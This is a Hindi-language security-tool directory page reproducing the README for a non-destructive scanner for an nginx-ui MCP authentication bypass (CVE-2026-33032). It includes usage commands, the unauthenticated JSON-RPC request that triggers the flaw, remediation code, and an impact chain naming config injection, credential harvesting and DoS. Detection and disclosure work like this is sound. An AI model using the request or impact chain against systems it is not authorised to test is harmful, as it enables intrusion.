Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-33032-scanner — # Nginx-UI MCP एंडपॉइंट प्रमाणीकरण बाईपास (CVE-2026-33032) के लिए गैर-विनाशकारी भेद्यता स्कैनर | Kitploit
उपकरण/GitHubGitHub/twinson333/cve-2026-33032-scanner
भेद्यता स्कैनरशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणAPI सुरक्षा
GitHubtwinson333/cve-2026-33032-scanner

cve-2026-33032-scanner

# Nginx-UI MCP एंडपॉइंट प्रमाणीकरण बाईपास (CVE-2026-33032) के लिए गैर-विनाशकारी भेद्यता स्कैनर

रिपॉजिटरी देखें
324 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33032 स्कैनर

Nginx-UI MCP एंडपॉइंट प्रमाणीकरण बाईपास के लिए गैर-विनाशकारी भेद्यता स्कैनर

भेद्यता अवलोकन

CVE-2026-33032 nginx-ui के Model Context Protocol (MCP) एकीकरण में एक प्रमाणीकरण बाईपास भेद्यता है। /mcp_message एंडपॉइंट में प्रमाणीकरण मिडलवेयर का अभाव है जबकि यह सभी MCP टूल्स तक पहुंच प्रदान करता है, जिससे दूरस्थ हमलावर निम्न कार्य कर सकते हैं:

  • nginx कॉन्फ़िगरेशन और स्थिति पढ़ना
  • nginx कॉन्फ़िगरेशन फ़ाइलें बनाना/संशोधित करना/हटाना
  • nginx सेवा को पुनरारंभ या रीलोड करना
  • संवेदनशील कॉन्फ़िगरेशन डेटा बाहर निकालना
  • ट्रैफ़िक अवरोधन के लिए दुर्भावनापूर्ण कॉन्फ़िगरेशन इंजेक्ट करना

मूल कारण

  1. प्रमाणीकरण असममितता: /mcp एंडपॉइंट को प्रमाणीकरण की आवश्यकता होती है, लेकिन /mcp_message को नहीं:

    root@kitploit:~
    r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
    r.Any("/mcp_message", middleware.IPWhiteList(), ...)  // AuthRequired() गायब है
    
  • फेल-ओपन IP व्हाइटलिस्ट: डिफ़ॉल्ट IP व्हाइटलिस्ट खाली है, जिसे मिडलवेयर "सभी को अनुमति दें" के रूप में मानता है

  • दोनों एंडपॉइंट एक ही हैंडलर साझा करते हैं: दोनों एक ही mcp.ServeHTTP() पर रूट होते हैं जो सभी MCP टूल इनवोकेशन को प्रोसेस करता है

  • स्कैनर विशेषताएं

    ✅ गैर-विनाशकारी परीक्षण - केवल रीड-ओनली MCP टूल्स का उपयोग करता है
    ✅ व्यापक फ़िंगरप्रिंटिंग - nginx-ui इंस्टॉलेशन की पहचान करता है
    ✅ सुरक्षित प्रूफ-ऑफ-कॉन्सेप्ट - कोई कॉन्फ़िगरेशन परिवर्तन नहीं किया जाता
    ✅ बैच स्कैनिंग - फ़ाइल से कई लक्ष्यों को प्रोसेस करता है
    ✅ विस्तृत रिपोर्टिंग - एकीकरण के लिए JSON आउटपुट

    स्थापना

    root@kitploit:~
    # स्कैनर को क्लोन या डाउनलोड करें
    git clone https://github.com/Twinson333/cve-2026-33032-scanner.git
    cd cve-2026-33032
    chmod +x cve-2026-33032-scanner.py
    
    # निर्भरताएं स्थापित करें (यदि आवश्यक हो)
    pip3 install requests
    

    उपयोग

    बेसिक स्कैन

    root@kitploit:~
    # एकल लक्ष्य स्कैन करें
    python3 cve-2026-33032-scanner.py -u http://target.com:9000
    
    # वर्बोज़ आउटपुट के साथ स्कैन करें
    python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v
    
    # कस्टम टाइमआउट
    python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15
    

    बैच स्कैनिंग

    root@kitploit:~
    # फ़ाइल से कई लक्ष्य स्कैन करें
    python3 cve-2026-33032-scanner.py -f targets.txt
    
    # वर्बोज़ आउटपुट और JSON रिपोर्ट के साथ
    python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json
    
    #Burp पिंगबैक
    python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net
    

    लक्ष्य फ़ाइल प्रारूप

    root@kitploit:~
    # targets.txt - प्रति पंक्ति एक URL
    http://192.168.1.100:9000
    https://nginx-ui.corp.com
    http://10.0.0.50:9000
    

    यह कैसे काम करता है

    स्कैनर एक बहु-चरणीय पहचान प्रक्रिया करता है:

    चरण 1: फ़िंगरप्रिंटिंग

    इंस्टॉलेशन की पहचान के लिए सामान्य nginx-ui एंडपॉइंट की जांच करता है:

    • /api/info - संस्करण जानकारी
    • /login - लॉगिन पेज
    • /api/auth/login - प्रमाणीकरण एंडपॉइंट
    • /mcp और /mcp_message - MCP एंडपॉइंट

    चरण 2: प्रमाणीकरण जांच

    यह सत्यापित करने के लिए /mcp एंडपॉइंट का परीक्षण करता है कि यह ठीक से प्रमाणीकरण की आवश्यकता रखता है (बेसलाइन)

    चरण 3: भेद्यता शोषण

    बिना प्रमाणीकरण के /mcp_message के माध्यम से गैर-विनाशकारी MCP टूल कॉल का प्रयास करता है:

    1. nginx_status (सबसे सुरक्षित) - nginx प्रक्रिया स्थिति पढ़ता है
    2. nginx_config_list - कॉन्फ़िगरेशन फ़ाइलें सूचीबद्ध करता है
    3. nginx_config_base_path - कॉन्फ़िग निर्देशिका पथ प्राप्त करता है

    यदि कोई भी टूल बिना प्रमाणीकरण के सफल होता है, तो भेद्यता की पुष्टि हो जाती है।

    उपयोग किए गए सुरक्षित MCP टूल्स

    स्कैनर केवल रीड-ओनली MCP टूल्स को इनवोक करता है:

    टूलविवरणप्रभाव
    nginx_statusnginx सेवा स्थिति पढ़ेंकोई परिवर्तन नहीं
    nginx_config_listकॉन्फ़िगरेशन फ़ाइलें सूचीबद्ध करेंकोई परिवर्तन नहीं
    nginx_config_base_pathकॉन्फ़िग निर्देशिका पथ प्राप्त करेंकोई परिवर्तन नहीं

    स्पष्ट रूप से टाले गए टूल्स:

    • nginx_config_add - फ़ाइलें बनाएगा
    • nginx_config_modify - कॉन्फ़िग बदलेगा
    • restart_nginx / reload_nginx - सेवा व्यवधान
    • nginx_config_enable - सक्रिय कॉन्फ़िग बदलेगा

    आउटपुट उदाहरण

    भेद्य लक्ष्य

    root@kitploit:~
    [+] nginx-ui पाया गया: '/login' में 'nginx-ui' मिला
    [+] /mcp एंडपॉइंट ठीक से सुरक्षित है
    
    [*] /mcp_message एंडपॉइंट का परीक्षण (CVE-2026-33032)...
      [*] टूल आज़मा रहा है: nginx_status - nginx स्थिति पढ़ें (सबसे सुरक्षित)
          स्थिति: 200
    
    ======================================================================
    [!] CVE-2026-33032 के लिए भेद्य
    ======================================================================
    प्रमाण: बिना प्रमाणीकरण के nginx_status सफलतापूर्वक निष्पादित किया गया
    

    सुरक्षित लक्ष्य

    root@kitploit:~
    [+] nginx-ui पाया गया: संस्करण एंडपॉइंट सुलभ है
    [+] /mcp एंडपॉइंट ठीक से सुरक्षित है
    
    [*] /mcp_message एंडपॉइंट का परीक्षण (CVE-2026-33032)...
      [*] टूल आज़मा रहा है: nginx_status - nginx स्थिति पढ़ें (सबसे सुरक्षित)
          स्थिति: 401
          प्रमाणीकरण आवश्यक (सुरक्षित) ✓
    
    [+] भेद्य नहीं - एंडपॉइंट को प्रमाणीकरण की आवश्यकता है
    

    उपचार

    यदि भेद्यता की पुष्टि होती है:

    1. तत्काल समाधान: /mcp_message में प्रमाणीकरण मिडलवेयर जोड़ें:

      root@kitploit:~
      r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
          func(c *gin.Context) {
              mcp.ServeHTTP(c)
          })
      
    2. गहराई में सुरक्षा:

      • IP व्हाइटलिस्ट को डिफ़ॉल्ट रूप से सभी-अस्वीकार करने के लिए कॉन्फ़िगर करें
      • यदि बाहरी पहुंच आवश्यक नहीं है तो MCP एंडपॉइंट को केवल लोकलहोस्ट तक सीमित करें
      • MCP एंडपॉइंट पर रेट लिमिटिंग लागू करें
    3. अपग्रेड: उपलब्ध होने पर पैच किए गए nginx-ui संस्करण में अपडेट करें

    जिम्मेदार प्रकटीकरण

    यह टूल निम्न के लिए डिज़ाइन किया गया है:

    • ✅ बग बाउंटी प्रोग्राम
    • ✅ अधिकृत पेनेट्रेशन परीक्षण
    • ✅ अनुमति के साथ सुरक्षा अनुसंधान
    • ✅ प्रकटीकरण से पहले भेद्यता सत्यापन

    इस टूल का उपयोग उन सिस्टम पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।

    बग बाउंटी टिप्स

    इस भेद्यता की रिपोर्ट करते समय:

    1. गंभीरता: क्रिटिकल (CVSS 9.8+)

      • नेटवर्क से सुलभ
      • कोई प्रमाणीकरण आवश्यक नहीं
      • पूर्ण सिस्टम समझौता
      • कॉन्फ़िग एक्सफ़िल्ट्रेशन + संशोधन
    2. प्रमाण: स्कैनर आउटपुट शामिल करें जो सफल अनप्रमाणित MCP टूल इनवोकेशन दिखाता है

    3. प्रभाव श्रृंखला:

      • अनप्रमाणित पहुंच → कॉन्फ़िग पढ़ना → बैकएंड टोपोलॉजी प्रकट
      • कॉन्फ़िग लिखना → दुर्भावनापूर्ण प्रॉक्सी इंजेक्शन → क्रेडेंशियल संग्रह
      • Nginx पुनरारंभ → सेवा व्यवधान → DoS
    4. सुरक्षित PoC: केवल रीड-ओनली टूल्स का उपयोग करें (nginx_status, nginx_config_list)

    तकनीकी विवरण

    MCP टूल इनवोकेशन प्रारूप

    root@kitploit:~
    POST /mcp_message HTTP/1.1
    Content-Type: application/json
    
    {
      "jsonrpc": "2.0",
      "method": "tools/call",
      "params": {
        "name": "nginx_status",
        "arguments": {}
      },
      "id": 1
    }
    

    सफल प्रतिक्रिया

    root@kitploit:~
    {
      "jsonrpc": "2.0",
      "result": {
        "content": [
          {
            "type": "text",
            "text": "nginx चल रहा है (PID: 1234)"
          }
        ]
      },
      "id": 1
    }
    

    सुरक्षित प्रतिक्रिया

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    {
      "error": "authentication required"
    }
    

    संदर्भ

    • CVE: CVE-2026-33032
    • प्रभावित: nginx-ui (MCP एकीकरण वाले संस्करण)
    • CVSS: 9.8 (क्रिटिकल)
    • CWE: CWE-306 (क्रिटिकल फ़ंक्शन के लिए प्रमाणीकरण की कमी)

    लाइसेंस

    यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

    लेखक

    एंटनी एस्थक ट्विन्सन @ साइबर तामारिन
    सुरक्षा शोधकर्ता | बग बाउंटी हंटर
    वेब एप्लिकेशन सुरक्षा और भेद्यता अनुसंधान में विशेषज्ञता


    अस्वीकरण: यह स्कैनर केवल गैर-विनाशकारी परीक्षण करता है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

    टूल डाउनलोड करें